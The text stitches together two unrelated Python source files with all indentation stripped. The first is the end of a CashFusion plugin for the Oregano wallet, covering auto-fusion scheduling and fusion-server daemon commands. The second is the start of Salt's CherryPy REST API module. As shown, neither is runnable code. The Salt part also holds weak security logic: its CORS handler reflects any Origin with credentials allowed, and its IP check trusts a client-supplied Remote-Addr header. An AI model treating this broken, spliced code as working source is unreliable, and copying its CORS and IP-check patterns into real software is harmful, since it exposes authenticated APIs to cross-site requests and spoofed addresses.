self.stop_autofusions(wallet, 'Tor cooldown', not_if_running = True)
return
if torcount > AUTOFUSE_RECENT_TOR_LIMIT_LOWER:
# no urgent need to stop fusions, but don't queue up any more.
dont_start_fusions = True
for wallet, password in wallets_and_passwords:
with wallet.lock:
if not hasattr(wallet, '_fusions'):
continue
if not wallet.up_to_date:
# We want a good view of the wallet so we know which coins
# are unspent and confirmed, and we know which addrs are
# used. Note: this `continue` will bypass the potential .stop()
# below.
continue
for f in list(wallet._fusions_auto):
if not f.is_alive():
wallet._fusions_auto.discard(f)
active_autofusions = list(wallet._fusions_auto)
if dont_start_fusions and not active_autofusions:
continue
num_auto = len(active_autofusions)
wallet_conf = Conf(wallet)
eligible, ineligible, sum_value, has_unconfirmed, has_coinbase = select_coins(wallet)
target_num_auto, confirmed_only = get_target_params_1(wallet, wallet_conf, active_autofusions, eligible)
if confirmed_only and has_unconfirmed:
for f in list(wallet._fusions_auto):
f.stop('Wallet has unconfirmed coins... waiting.', not_if_running = True)
continue
if not dont_start_fusions and num_auto < min(target_num_auto, MAX_AUTOFUSIONS_PER_WALLET):
# we don't have enough auto-fusions running, so start one
fraction = get_target_params_2(wallet_conf, sum_value)
chosen_buckets = select_random_coins(wallet, fraction, eligible)
coins = [c for l in chosen_buckets for c in l]
if not coins:
self.print_error("auto-fusion skipped due to lack of coins")
continue
if wallet_conf.fusion_mode == 'consolidate':
max_outputs = CONSOLIDATE_MAX_OUTPUTS
if len(chosen_buckets) < (MIN_TX_COMPONENTS - max_outputs):
self.print_error("consolidating auto-fusion skipped due to lack of unrelated coins")
continue
else:
max_outputs = None
try:
f = self.start_fusion(wallet, password, coins, max_outputs = max_outputs, inactive_timeout = AUTOFUSE_INACTIVE_TIMEOUT)
self.print_error("started auto-fusion")
except RuntimeError as e:
self.print_error(f"auto-fusion skipped due to error: {e}")
return
wallet._fusions_auto.add(f)
def start_fusion_server(self, network, bindhost, port, upnp = None, announcehost = None, donation_address = None):
if self.fusion_server:
raise RuntimeError("server already running")
donation_address = (isinstance(donation_address, Address) and donation_address) or None
self.fusion_server = FusionServer(self.config, network, bindhost, port, upnp = upnp, announcehost = announcehost, donation_address = donation_address)
self.fusion_server.start()
return self.fusion_server.host, self.fusion_server.port
def stop_fusion_server(self):
try:
self.fusion_server.stop('server stopped by operator')
self.fusion_server = None
except Exception:
pass
def update_coins_ui(self, wallet):
''' Default implementation does nothing. Qt plugin subclass overrides
this, which sends a signal to the main thread to update the coins tab.
This is called by the Fusion thread (in its thread context) when it
freezes & unfreezes coins. '''
def notify_server_status(self, b, tup : tuple = None):
''' The Qt plugin subclass implements this to tell the GUI about bad
servers. '''
if not b: self.print_error("notify_server_status:", b, str(tup))
@hook
def donation_address(self, window) -> Optional[Tuple[str,Address]]:
''' Plugin API: Returns a tuple of (description, Address) or None. This
is the donation address that we as a client got from the remote server
(as opposed to the donation address we announce if we are a server). '''
if self.remote_donation_address and Address.is_valid(self.remote_donation_address):
return (self.fullname() + " " + _("Server") + ": " + self.get_server()[0], Address.from_string(self.remote_donation_address))
@daemon_command
def fusion_server_start(self, daemon, config):
# Usage:
# ./oregano daemon fusion_server_start <bindhost>(,<announcehost>) <port>
# ./oregano daemon fusion_server_start <bindhost>(,<announcehost>) <port> upnp
# ./oregano daemon fusion_server_start <bindhost>(,<announcehost>) <port> <donation_addr>
# ./oregano daemon fusion_server_start <bindhost>(,<announcehost>) <port> upnp <donation_addr>
# e.g.:
# ./oregano daemon fusion_server_start 0.0.0.0,myfusionserver.com 8787 upnp bitcoincash:qpxiweuqoiweweqeweqw
#
# The main server port will be bound on <bindhost>:<port>.
# Covert submissions will be bound on <bindhost>:<ephemeral_port> (the port is chosen by the OS)
# The main server will tell clients to connect to <announcehost>:<ephemeral_port> .
# The default announcehost is based on an autodetection system, which may not work for some server networking setups.
network = daemon.network
if not network:
return "error: cannot run fusion server without an SPV server connection"
def invoke(firstarg = '0.0.0.0', sport='8787', upnp_str = None, addr_str = None):
bindhost, *extrahosts = firstarg.split(',')
if len(extrahosts) > 1:
raise Exception("too many hosts")
elif len(extrahosts) == 1:
[announcehost,] = extrahosts
else:
announcehost = None
port = int(sport)
pnp = get_upnp() if upnp_str == 'upnp' else None
if not pnp and not addr_str:
# third arg may be addr_str, so swap the args
addr_str = upnp_str
upnp_str = None
addr = None
if addr_str:
assert Address.is_valid(addr_str), "Invalid donation address specified"
addr = Address.from_string(addr_str)
return self.start_fusion_server(network, bindhost, port, upnp = pnp, announcehost = announcehost, donation_address = addr)
try:
host, port = invoke(*config.get('subargs', ()))
except Exception as e:
import traceback, sys; traceback.print_exc(file=sys.stderr)
return f'error: {str(e)}'
return (host, port)
@daemon_command
def fusion_server_stop(self, daemon, config):
self.stop_fusion_server()
return 'ok'
@daemon_command
def fusion_server_status(self, daemon, config):
if not self.fusion_server:
return "fusion server not running"
return dict(poolsizes = {t: len(pool.pool) for t,pool in self.fusion_server.waiting_pools.items()})
@daemon_command
def fusion_server_fuse(self, daemon, config):
if self.fusion_server is None:
return
subargs = config.get('subargs', ())
if len(subargs) != 1:
return "expecting tier"
tier = int(subargs[0])
num_clients = self.fusion_server.start_fuse(tier)
return num_clients
|
app.py
|
# encoding: utf-8
'''
A REST API for Salt
===================
.. versionadded:: 2014.7.0
.. py:currentmodule:: salt.netapi.rest_cherrypy.app
:depends:
- CherryPy Python module. Version 3.2.3 is currently recommended when
SSL is enabled, since this version worked the best with SSL in
internal testing. Versions 3.2.3 - 4.x can be used if SSL is not enabled.
Be aware that there is a known
`SSL error <https://bitbucket.org/cherrypy/cherrypy/issue/1298/ssl-not-working>`_
introduced in version 3.2.5. The issue was reportedly resolved with
CherryPy milestone 3.3, but the patch was committed for version 3.6.1.
:optdepends: - ws4py Python module for websockets support.
:client_libraries:
- Java: https://github.com/SUSE/salt-netapi-client
- Python: https://github.com/saltstack/pepper
:setup:
All steps below are performed on the machine running the Salt Master
daemon. Configuration goes into the Master configuration file.
1. Install ``salt-api``. (This step varies between OS and Linux distros.
Some package systems have a split package, others include salt-api in
the main Salt package. Ensure the ``salt-api --version`` output matches
the ``salt --version`` output.)
2. Install CherryPy. (Read the version caveat in the section above.)
3. Optional: generate self-signed SSL certificates.
Using a secure HTTPS connection is strongly recommended since Salt
eauth authentication credentials will be sent over the wire.
1. Install the PyOpenSSL package.
2. Generate a self-signed certificate using the
:py:func:`~salt.modules.tls.create_self_signed_cert` execution
function.
.. code-block:: bash
salt-call --local tls.create_self_signed_cert
4. Edit the master config to create at least one external auth user or
group following the :ref:`full external auth instructions <acl-eauth>`.
5. Edit the master config with the following production-ready example to
enable the ``rest_cherrypy`` module. (Adjust cert paths as needed, or
disable SSL (not recommended!).)
.. code-block:: yaml
rest_cherrypy:
port: 8000
ssl_crt: /etc/pki/tls/certs/localhost.crt
ssl_key: /etc/pki/tls/certs/localhost.key
6. Restart the ``salt-master`` daemon.
7. Start the ``salt-api`` daemon.
:configuration:
All available configuration options are detailed below. These settings
configure the CherryPy HTTP server and do not apply when using an external
server such as Apache or Nginx.
port
**Required**
The port for the webserver to listen on.
host : ``0.0.0.0``
The socket interface for the HTTP server to listen on.
debug : ``False``
Starts the web server in development mode. It will reload itself when
the underlying code is changed and will output more debugging info.
log_access_file
Path to a file to write HTTP access logs.
.. versionaddedd:: Carbon
log_error_file
Path to a file to write HTTP error logs.
.. versionaddedd:: Carbon
ssl_crt
The path to a SSL certificate. (See below)
ssl_key
The path to the private key for your SSL certificate. (See below)
ssl_chain
(Optional when using PyOpenSSL) the certificate chain to pass to
``Context.load_verify_locations``.
disable_ssl
A flag to disable SSL. Warning: your Salt authentication credentials
will be sent in the clear!
webhook_disable_auth : False
The :py:class:`Webhook` URL requires authentication by default but
external services cannot always be configured to send authentication.
See the Webhook documentation for suggestions on securing this
interface.
webhook_url : /hook
Configure the URL endpoint for the :py:class:`Webhook` entry point.
thread_pool : ``100``
The number of worker threads to start up in the pool.
socket_queue_size : ``30``
Specify the maximum number of HTTP connections to queue.
expire_responses : True
Whether to check for and kill HTTP responses that have exceeded the
default timeout.
max_request_body_size : ``1048576``
Maximum size for the HTTP request body.
collect_stats : False
Collect and report statistics about the CherryPy server
Reports are available via the :py:class:`Stats` URL.
static
A filesystem path to static HTML/JavaScript/CSS/image assets.
static_path : ``/static``
The URL prefix to use when serving static assets out of the directory
specified in the ``static`` setting.
app
A filesystem path to an HTML file that will be served as a static file.
This is useful for bootstrapping a single-page JavaScript app.
app_path : ``/app``
The URL prefix to use for serving the HTML file specified in the ``app``
setting. This should be a simple name containing no slashes.
Any path information after the specified path is ignored; this is
useful for apps that utilize the HTML5 history API.
root_prefix : ``/``
A URL path to the main entry point for the application. This is useful
for serving multiple applications from the same URL.
.. _rest_cherrypy-auth:
Authentication
--------------
Authentication is performed by passing a session token with each request.
Tokens are generated via the :py:class:`Login` URL.
The token may be sent in one of two ways: as a custom header or as a session
cookie. The latter is far more convenient for clients that support cookies.
* Include a custom header named :mailheader:`X-Auth-Token`.
For example, using curl:
.. code-block:: bash
curl -sSk https://localhost:8000/login \\
-H 'Accept: application/x-yaml' \\
-d username=saltdev \\
-d password=saltdev \\
-d eauth=auto
Copy the ``token`` value from the output and include it in subsequent requests:
.. code-block:: bash
curl -sSk https://localhost:8000 \\
-H 'Accept: application/x-yaml' \\
-H 'X-Auth-Token: 697adbdc8fe971d09ae4c2a3add7248859c87079'\\
-d client=local \\
-d tgt='*' \\
-d fun=test.ping
* Sent via a cookie. This option is a convenience for HTTP clients that
automatically handle cookie support (such as browsers).
For example, using curl:
.. code-block:: bash
# Write the cookie file:
curl -sSk https://localhost:8000/login \\
-c ~/cookies.txt \\
-H 'Accept: application/x-yaml' \\
-d username=saltdev \\
-d password=saltdev \\
-d eauth=auto
# Read the cookie file:
curl -sSk https://localhost:8000 \\
-b ~/cookies.txt \\
-H 'Accept: application/x-yaml' \\
-d client=local \\
-d tgt='*' \\
-d fun=test.ping
Another example using the :program:`requests` library in Python:
.. code-block:: python
>>> import requests
>>> session = requests.Session()
>>> session.post('http://localhost:8000/login', json={
'username': 'saltdev',
'password': 'saltdev',
'eauth': 'auto',
})
<Response [200]>
>>> resp = session.post('http://localhost:8000', json=[{
'client': 'local',
'tgt': '*',
'fun': 'test.arg',
'arg': ['foo', 'bar'],
'kwarg': {'baz': 'Baz!'},
}])
>>> resp.json()
{u'return': [{
...snip...
}]}
.. seealso:: You can bypass the session handling via the :py:class:`Run` URL.
Usage
-----
This interface directly exposes Salt's :ref:`Python API <python-api>`.
Everything possible at the CLI is possible through the Python API. Commands are
executed on the Salt Master.
The root URL (``/``) is RPC-like in that it accepts instructions in the request
body for what Salt functions to execute, and the response contains the result
of those function calls.
For example:
.. code-block:: text
% curl -sSi https://localhost:8000 \
-H 'Content-type: application/json' \
-d '[{
"client": "local",
"tgt": "*",
"fun": "test.ping"
}]'
HTTP/1.1 200 OK
Content-Type: application/json
[...snip...]
{"return": [{"jerry": true}]}
The request body must be an array of commands. Use this workflow to build a
command:
1. Choose a client interface.
2. Choose a function.
3. Fill out the remaining parameters needed for the chosen client.
The ``client`` field is a reference to the main Python classes used in Salt's
Python API. Read the full :ref:`client interfaces <netapi-clients>`
documentation, but in short:
* "local" uses :py:class:`LocalClient <salt.client.LocalClient>` which sends
commands to Minions. Equivalent to the ``salt`` CLI command.
* "runner" uses :py:class:`RunnerClient <salt.runner.RunnerClient>` which
invokes runner modules on the Master. Equivalent to the ``salt-run`` CLI
command.
* "wheel" uses :py:class:`WheelClient <salt.wheel.WheelClient>` which invokes
wheel modules on the Master. Wheel modules do not have a direct CLI
equivalent but they typically manage Master-side resources such as state
files, pillar files, the Salt config files, and the :py:mod:`key wheel module
<salt.wheel.key>` exposes similar functionality as the ``salt-key`` CLI
command.
Most clients have variants like synchronous or asyncronous execution as well as
others like batch execution. See the :ref:`full list of client interfaces
<netapi-clients>`.
Each client requires different arguments and sometimes has different syntax.
For example, ``LocalClient`` requires the ``tgt`` argument because it forwards
the command to Minions and the other client interfaces do not. ``LocalClient``
also takes ``arg`` (array) and ``kwarg`` (dictionary) arguments because these
values are sent to the Minions and used to execute the requested function
there. ``RunnerClient`` and ``WheelClient`` are executed directly on the Master
and thus do not need or accept those arguments.
Read the method signatures in the client documentation linked above, but
hopefully an example will help illustrate the concept. This example causes Salt
to execute two functions -- the :py:func:`test.arg execution function
<salt.modules.test.arg>` using ``LocalClient`` and the :py:func:`test.arg
runner function <salt.runners.test.arg>` using ``RunnerClient``; note the
different structure for each command. The results for both are combined and
returned as one response.
.. code-block:: text
% curl -b ~/cookies.txt -sSi localhost:8000 \
-H 'Content-type: application/json' \
-d '
[
{
"client": "local",
"tgt": "*",
"fun": "test.arg",
"arg": ["positional arg one", "positional arg two"],
"kwarg": {
"keyword arg one": "Hello from a minion",
"keyword arg two": "Hello again from a minion"
}
},
{
"client": "runner",
"fun": "test.arg",
"keyword arg one": "Hello from a master",
"keyword arg two": "Runners do not support positional args"
}
]
'
HTTP/1.1 200 OK
[...snip...]
{
"return": [
{
"jerry": {
"args": [
"positional arg one",
"positional arg two"
],
"kwargs": {
"keyword arg one": "Hello from a minion",
"keyword arg two": "Hello again from a minion",
[...snip...]
}
},
[...snip; other minion returns here...]
},
{
"args": [],
"kwargs": {
"keyword arg two": "Runners do not support positional args",
"keyword arg one": "Hello from a master"
}
}
]
}
One more example, this time with more commonly used functions:
.. code-block:: text
curl -b /tmp/cookies.txt -sSi localhost:8000 \
-H 'Content-type: application/json' \
-d '
[
{
"client": "local",
"tgt": "*",
"fun": "state.sls",
"kwarg": {
"mods": "apache",
"pillar": {
"lookup": {
"wwwdir": "/srv/httpd/htdocs"
}
}
}
},
{
"client": "runner",
"fun": "cloud.create",
"provider": "my-ec2-provider",
"instances": "my-centos-6",
"image": "ami-1624987f",
"delvol_on_destroy", true
}
]
'
HTTP/1.1 200 OK
[...snip...]
{
"return": [
{
"jerry": {
"pkg_|-install_apache_|-httpd_|-installed": {
[...snip full state return here...]
}
}
[...snip other minion returns here...]
},
{
[...snip full salt-cloud output here...]
}
]
}
Content negotiation
-------------------
This REST interface is flexible in what data formats it will accept as well
as what formats it will return (e.g., JSON, YAML, urlencoded).
* Specify the format of data in the request body by including the
:mailheader:`Content-Type` header.
* Specify the desired data format for the response body with the
:mailheader:`Accept` header.
We recommend the JSON format for most HTTP requests. urlencoded data is simple
and cannot express complex data structures -- and that is often required for
some Salt commands, such as starting a state run that uses Pillar data. Salt's
CLI tool can reformat strings passed in at the CLI into complex data
structures, and that behavior also works via salt-api, but that can be brittle
and since salt-api can accept JSON it is best just to send JSON.
Here is an example of sending urlencoded data:
.. code-block:: bash
curl -sSik https://localhost:8000 \\
-b ~/cookies.txt \\
-d client=runner \\
-d fun='jobs.lookup_jid' \\
-d jid='20150129182456704682'
.. admonition:: urlencoded data caveats
* Only a single command may be sent per HTTP request.
* Repeating the ``arg`` parameter multiple times will cause those
parameters to be combined into a single list.
Note, some popular frameworks and languages (notably jQuery, PHP, and
Ruby on Rails) will automatically append empty brackets onto repeated
query string parameters. E.g., ``?foo[]=fooone&foo[]=footwo``. This is
**not** supported; send ``?foo=fooone&foo=footwo`` instead, or send JSON
or YAML.
A note about ``curl``
The ``-d`` flag to curl does *not* automatically urlencode data which can
affect passwords and other data that contains characters that must be
encoded. Use the ``--data-urlencode`` flag instead. E.g.:
.. code-block:: bash
curl -ksi http://localhost:8000/login \\
-H "Accept: application/json" \\
-d username='myapiuser' \\
--data-urlencode password='1234+' \\
-d eauth='pam'
.. |req_token| replace:: a session token from :py:class:`~Login`.
.. |req_accept| replace:: the desired response format.
.. |req_ct| replace:: the format of the request body.
.. |res_ct| replace:: the format of the response body; depends on the
:mailheader:`Accept` request header.
.. |200| replace:: success
.. |400| replace:: bad or malformed request
.. |401| replace:: authentication required
.. |406| replace:: requested Content-Type not available
'''
# We need a custom pylintrc here...
# pylint: disable=W0212,E1101,C0103,R0201,W0221,W0613
# Import Python libs
from __future__ import absolute_import
import collections
import itertools
import functools
import logging
import json
import tarfile
import time
from multiprocessing import Process, Pipe
# Import third-party libs
# pylint: disable=import-error
import cherrypy
import yaml
import salt.ext.six as six
# pylint: enable=import-error
# Import Salt libs
import salt
import salt.auth
import salt.utils.event
# Import salt-api libs
import salt.netapi
logger = logging.getLogger(__name__)
# Imports related to websocket
try:
from .tools import websockets
from . import event_processor
HAS_WEBSOCKETS = True
except ImportError:
websockets = type('websockets', (object,), {
'SynchronizingWebsocket': None,
})
HAS_WEBSOCKETS = False
def html_override_tool():
'''
Bypass the normal handler and serve HTML for all URLs
The ``app_path`` setting must be non-empty and the request must ask for
``text/html`` in the ``Accept`` header.
'''
apiopts = cherrypy.config['apiopts']
request = cherrypy.request
url_blacklist = (
apiopts.get('app_path', '/app'),
apiopts.get('static_path', '/static'),
)
if 'app' not in cherrypy.config['apiopts']:
return
if request.path_info.startswith(url_blacklist):
return
if request.headers.get('Accept') == '*/*':
return
try:
wants_html = cherrypy.lib.cptools.accept('text/html')
except cherrypy.HTTPError:
return
else:
if wants_html != 'text/html':
return
raise cherrypy.InternalRedirect(apiopts.get('app_path', '/app'))
def salt_token_tool():
'''
If the custom authentication header is supplied, put it in the cookie dict
so the rest of the session-based auth works as intended
'''
x_auth = cherrypy.request.headers.get('X-Auth-Token', None)
# X-Auth-Token header trumps session cookie
if x_auth:
cherrypy.request.cookie['session_id'] = x_auth
def salt_api_acl_tool(username, request):
'''
..versionadded:: 2016.3.0
Verifies user requests against the API whitelist. (User/IP pair)
in order to provide whitelisting for the API similar to the
master, but over the API.
..code-block:: yaml
rest_cherrypy:
api_acl:
users:
'*':
- 1.1.1.1
- 1.1.1.2
foo:
- 8.8.4.4
bar:
- '*'
:param username: Username to check against the API.
:type username: str
:param request: Cherrypy request to check against the API.
:type request: cherrypy.request
'''
failure_str = ("[api_acl] Authentication failed for "
"user {0} from IP {1}")
success_str = ("[api_acl] Authentication sucessful for "
"user {0} from IP {1}")
pass_str = ("[api_acl] Authentication not checked for "
"user {0} from IP {1}")
acl = None
# Salt Configuration
salt_config = cherrypy.config.get('saltopts', None)
if salt_config:
# Cherrypy Config.
cherrypy_conf = salt_config.get('rest_cherrypy', None)
if cherrypy_conf:
# ACL Config.
acl = cherrypy_conf.get('api_acl', None)
ip = request.remote.ip
if acl:
users = acl.get('users', {})
if users:
if username in users:
if ip in users[username] or '*' in users[username]:
logger.info(success_str.format(username, ip))
return True
else:
logger.info(failure_str.format(username, ip))
return False
elif username not in users and '*' in users:
if ip in users['*'] or '*' in users['*']:
logger.info(success_str.format(username, ip))
return True
else:
logger.info(failure_str.format(username, ip))
return False
else:
logger.info(failure_str.format(username, ip))
return False
else:
logger.info(pass_str.format(username, ip))
return True
def salt_ip_verify_tool():
'''
If there is a list of restricted IPs, verify current
client is coming from one of those IPs.
'''
# This is overly cumbersome and crude,
# But, it's also safe... ish...
salt_config = cherrypy.config.get('saltopts', None)
if salt_config:
cherrypy_conf = salt_config.get('rest_cherrypy', None)
if cherrypy_conf:
auth_ip_list = cherrypy_conf.get('authorized_ips', None)
if auth_ip_list:
logger.debug("Found IP list: {0}".format(auth_ip_list))
rem_ip = cherrypy.request.headers.get('Remote-Addr', None)
logger.debug("Request from IP: {0}".format(rem_ip))
if rem_ip not in auth_ip_list:
logger.error("Blocked IP: {0}".format(rem_ip))
cherrypy.response.status = 403
return {
'status': cherrypy.response.status,
'return': "Bad IP",
}
def salt_auth_tool():
'''
Redirect all unauthenticated requests to the login page
'''
# Redirect to the login page if the session hasn't been authed
if 'token' not in cherrypy.session: # pylint: disable=W8601
raise cherrypy.HTTPError(401)
# Session is authenticated; inform caches
cherrypy.response.headers['Cache-Control'] = 'private'
def cors_handler(*args, **kwargs):
'''
Check a CORS preflight request and return a valid response
'''
req_head = cherrypy.request.headers
resp_head = cherrypy.response.headers
ac_method = req_head.get('Access-Control-Request-Method', None)
allowed_methods = ['GET', 'POST']
allowed_headers = ['X-Auth-Token', 'Content-Type']
if ac_method and ac_method in allowed_methods:
resp_head['Access-Control-Allow-Methods'] = ', '.join(allowed_methods)
resp_head['Access-Control-Allow-Headers'] = ', '.join(allowed_headers)
resp_head['Connection'] = 'keep-alive'
resp_head['Access-Control-Max-Age'] = '1400'
return {}
def cors_tool():
'''
Handle both simple and complex CORS requests
Add CORS headers to each response. If the request is a CORS preflight
request swap out the default handler with a simple, single-purpose handler
that verifies the request and provides a valid CORS response.
'''
req_head = cherrypy.request.headers
resp_head = cherrypy.response.headers
# Always set response headers necessary for 'simple' CORS.
resp_head['Access-Control-Allow-Origin'] = req_head.get('Origin', '*')
resp_head['Access-Control-Expose-Headers'] = 'GET, POST'
resp_head['Access-Control-Allow-Credentials'] = 'true'
# If this is a non-simple CORS preflight request swap out the handler.
if cherrypy.request.method == 'OPTIONS':
cherrypy.serving.request.handler = cors_handler
# Be conservative in what you send
# Maps Content-Type to serialization functions; this is a tuple of tuples to
# preserve order of preference.
ct_out_map = (
('application/json', json.dumps),
('application/x-yaml', functools.partial(
yaml.safe_dump, default_flow_style=False)),
)
def hypermedia_handler(*args, **kwargs):
'''
Determine the best output format based on the Accept header, execute the
regular handler, and transform the output to the request content type (even
if it's an error).
:param args: Pass args through to the main handler
:param kwargs: Pass kwargs through to the main handler
'''
# Execute the real handler. Handle or pass-through any errors we know how
# to handle (auth & HTTP errors). Reformat any errors we don't know how to
# handle as a data structure.
try:
cherrypy.response.processors = dict(ct_out_map)
ret = cherrypy.serving.request._hypermedia_inner_handler(*args, **kwargs)
except (salt.exceptions.EauthAuthenticationError,
salt.exceptions.TokenAuthenticationError):
raise cherrypy.HTTPError(401)
except salt.exceptions.SaltInvocationError:
raise cherrypy.HTTPError(400)
except (salt.exceptions.SaltDaemonNotRunning,
salt.exceptions.SaltReqTimeoutError) as exc:
raise cherrypy.HTTPError(503, exc.strerror)
except cherrypy.CherryPyException:
raise
except Exception as exc:
import traceback
logger.debug("Error while processing request for: %s",
cherrypy.request.path_info,
exc_info=True)
cherrypy.response.status = 500
ret = {
'status': cherrypy.response.status,
'return': '{0}'.format(traceback.format_exc(exc))
if cherrypy.config['debug']
else "An unexpected error occurred"}
# Raises 406 if requested content-type is not supported
best = cherrypy.lib.cptools.accept([i for (i, _) in ct_out_map])
# Transform the output from the handler into the requested output format
cherrypy.response.headers['Content-Type'] = best
out = cherrypy.response.processors[best]
try:
return out(ret)
except Exception:
msg = 'Could not serialize the return data from Salt.'
logger.debug(msg, exc_info=True)
raise cherrypy.HTTPError(500, msg)
def hypermedia_out():
'''
Determine the best handler for the requested content type
Wrap the normal handler and transform the output from that handler into the
requested content type
'''
request = cherrypy.serving.request
request._hypermedia_inner_handler = request.handler
request.handler = hypermedia_handler
@functools.wraps
def process_request_body(fn):
'''
A decorator to skip a processor function if process_request_body is False
'''
def wrapped(*args, **kwargs): # pylint: disable=C0111
if cherrypy.request.process_request_body is not False:
fn(*args, **kwargs)
return wrapped
def urlencoded_processor(entity):
'''
Accept x-www-form-urlencoded data (run through CherryPy's formatter)
and reformat it into a Low State data structure.
Since we can't easily represent complicated data structures with
key-value pairs, any more complicated requirements (e.g. compound
commands) must instead be delivered via JSON or YAML.
For example::
.. code-block:: bash
curl -si localhost:8000 -d client=local -d tgt='*' \\
-d fun='test.kwarg' -d arg='one=1' -d arg='two=2'
:param entity: raw POST data
'''
# First call out to CherryPy's default processor
cherrypy._cpreqbody.process_urlencoded(entity)
cherrypy.serving.request.unserialized_data = entity.params
cherrypy.serving.request.raw_body = ''
@process_request_body
def json_processor(entity):
'''
Unserialize raw POST data in JSON format to a Python data structure.
:param entity: raw POST data
'''
body = entity.fp.read()
try:
cherrypy.serving.request.unserialized_data = json.loads(body)
except ValueError:
raise cherrypy.HTTPError(400, 'Invalid JSON document')
cherrypy.serving.request.raw_body = body
@process_request_body
def yaml_processor(entity):
'''
Unserialize raw POST data in YAML format to a Python data structure.
:param entity: raw POST data
'''
body = entity.fp.read()
try:
cherrypy.serving.request.unserialized_data = yaml.safe_load(body)
except ValueError:
raise cherrypy.HTTPError(400, 'Invalid YAML document')
cherrypy.serving.request.raw_body = body
@process_request_body
def text_processor(entity):
'''
Attempt to unserialize plain text as JSON
Some large services still send JSON with a text/plain Content-Type. Those
services are bad and should feel bad.
:param entity: raw POST data
'''
body = entity.fp.read()
try:
cherrypy.serving.request.unserialized_data = json.loads(body)
except ValueError:
cherrypy.serving.request.unserialized_data = body
cherrypy.serving.request.raw_body = body
def hypermedia_in():
'''
Unserialize POST/PUT data of a specified Content-Type.
The following custom processors all are intended to format Low State data
and will place that data structure into the request object.
:raises HTTPError: if the request contains a Content-Type that we do not
have a processor for
'''
# Be liberal in what you accept
ct_in_map = {
'application/x-www-form-urlencoded': urlencoded_processor,
'application/json': json_processor,
'application/x-yaml': yaml_processor,
'text/yaml': yaml_processor,
'text/plain': text_processor,
}
# Do not process the body for POST requests that have specified no content
# or have not specified Content-Length
if (cherrypy.request.method.upper() == 'POST'
and cherrypy.request.headers.get('Content-Length', '0') == '0'):
cherrypy.request.process_request_body = False
cherrypy.request.unserialized_data = None
cherrypy.request.body.processors.clear()
cherrypy.request.body.default_proc = cherrypy.HTTPError(
406, 'Content type not supported')
cherrypy.request.body.processors = ct_in_map
def lowdata_fmt():
'''
Validate and format lowdata from incoming unserialized request data
This tool requires that the hypermedia_in tool has already been run.
'''
if cherrypy.request.method.upper() != 'POST':
return
data = cherrypy.request.unserialized_data
# if the data was sent as urlencoded, we need to make it a list.
# this is a very forgiving implementation as different clients set different
# headers for form encoded data (including charset or something similar)
if data and not isinstance(data, list):
# Make the 'arg' param a list if not already
if 'arg' in data and not isinstance(data['arg'], list):
data['arg'] = [data['arg']]
# Finally, make a Low State and put it in request
cherrypy.request.lowstate = [data]
else:
cherrypy.serving.request.lowstate = data
cherrypy.tools.html_override = cherrypy.Tool('on_start_resource',
html_override_tool, priority=53)
cherrypy.tools.salt_token = cherrypy.Tool('on_start_resource',
salt_token_tool, priority=55)
cherrypy.tools.salt_auth = cherrypy.Tool('before_request_body',
salt_auth_tool, priority=60)
cherrypy.tools.hypermedia_in = cherrypy.Tool('before_request_body',
hypermedia_in)
cherrypy.tools.cors_tool = cherrypy.Tool('before_request_body',
cors_tool, priority=30)
cherrypy.tools.lowdata_fmt = cherrypy.Tool('before_handler',
lowdata_fmt, priority=40)
cherrypy.tools.hypermedia_out = cherrypy.Tool('before_handler',
hypermedia_out)
cherrypy.tools.salt_ip_verify = cherrypy.Tool('before_handler',
salt_ip_verify_tool)
###############################################################################
class LowDataAdapter(object):
'''
The primary entry point to Salt's REST API
'''
exposed = True
_cp_config = {
'tools.sessions.on': True,
'tools.sessions.timeout': 60 * 10, # 10 hours
# 'tools.autovary.on': True,
'tools.hypermedia_out.on': True,
'tools.hypermedia_in.on': True,
'tools.lowdata_fmt.on': True,
'tools.salt_ip_verify.on': True,
}
def __init__(self):
self.opts = cherrypy.config['saltopts']
self.api = salt.netapi.NetapiClient(self.opts)
def exec_lowstate(self, client=None, token=None):
'''
Pull a Low State data structure from request and execute the low-data
chunks through Salt. The low-data chunks will be updated to include the
authorization token for the current session.
'''
lowstate = cherrypy.request.lowstate
# Release the session lock before executing any potentially
# long-running Salt commands. This allows different threads to execute
# Salt commands concurrently without blocking.
if cherrypy.request.config.get('tools.sessions.on', False):
cherrypy.session.release_lock()
# if the lowstate loaded isn't a list, lets notify the client
if not isinstance(lowstate, list):
raise cherrypy.HTTPError(400, 'Lowstates must be a list')
# Make any requested additions or modifications to each lowstate, then
# execute each one and yield the result.
for chunk in lowstate:
if token:
chunk['token'] = token
if cherrypy.session.get('user'):
chunk['__current_eauth_user'] = cherrypy.session.get('user')
if cherrypy.session.get('groups'):
chunk['__current_eauth_groups'] = cherrypy.session.get('groups')
if client:
chunk['client'] = client
# Make any 'arg' params a list if not already.
# This is largely to fix a deficiency in the urlencoded format.
if 'arg' in chunk and not isinstance(chunk['arg'], list):
chunk['arg'] = [chunk['arg']]
ret = self.api.run(chunk)
# Sometimes Salt gives us a return and sometimes an iterator
if isinstance(ret, collections.Iterator):
for i in ret:
yield i
else:
yield ret
def GET(self):
'''
An explanation of the API with links of where to go next
.. http:get:: /
:reqheader Accept: |req_accept|
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000
.. code-block:: http
GET / HTTP/1.1
Host: localhost:8000
Accept: application/json
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Type: application/json
'''
import inspect
return {
'return': "Welcome",
'clients': salt.netapi.CLIENTS,
}
@cherrypy.tools.salt_token()
@cherrypy.tools.salt_auth()
def POST(self, **kwargs):
'''
Send one or more Salt commands in the request body
.. http:post:: /
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:reqheader Content-Type: |req_ct|
:resheader Content-Type: |res_ct|
:status 200: |200|
:status 400: |400|
:status 401: |401|
:status 406: |406|
:term:`lowstate` data describing Salt commands must be sent in the
request body.
**Example request:**
.. code-block:: bash
curl -sSik https://localhost:8000 \\
-b ~/cookies.txt \\
-H "Accept: application/x-yaml" \\
-H "Content-type: application/json" \\
-d '[{"client": "local", "tgt": "*", "fun": "test.ping"}]'
.. code-block:: http
POST / HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
X-Auth-Token: d40d1e1e
Content-Type: application/json
[{"client": "local", "tgt": "*", "fun": "test.ping"}]
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 200
Allow: GET, HEAD, POST
Content-Type: application/x-yaml
return:
- ms-0: true
ms-1: true
ms-2: true
ms-3: true
ms-4: true
'''
return {
'return': list(self.exec_lowstate(
token=cherrypy.session.get('token')))
}
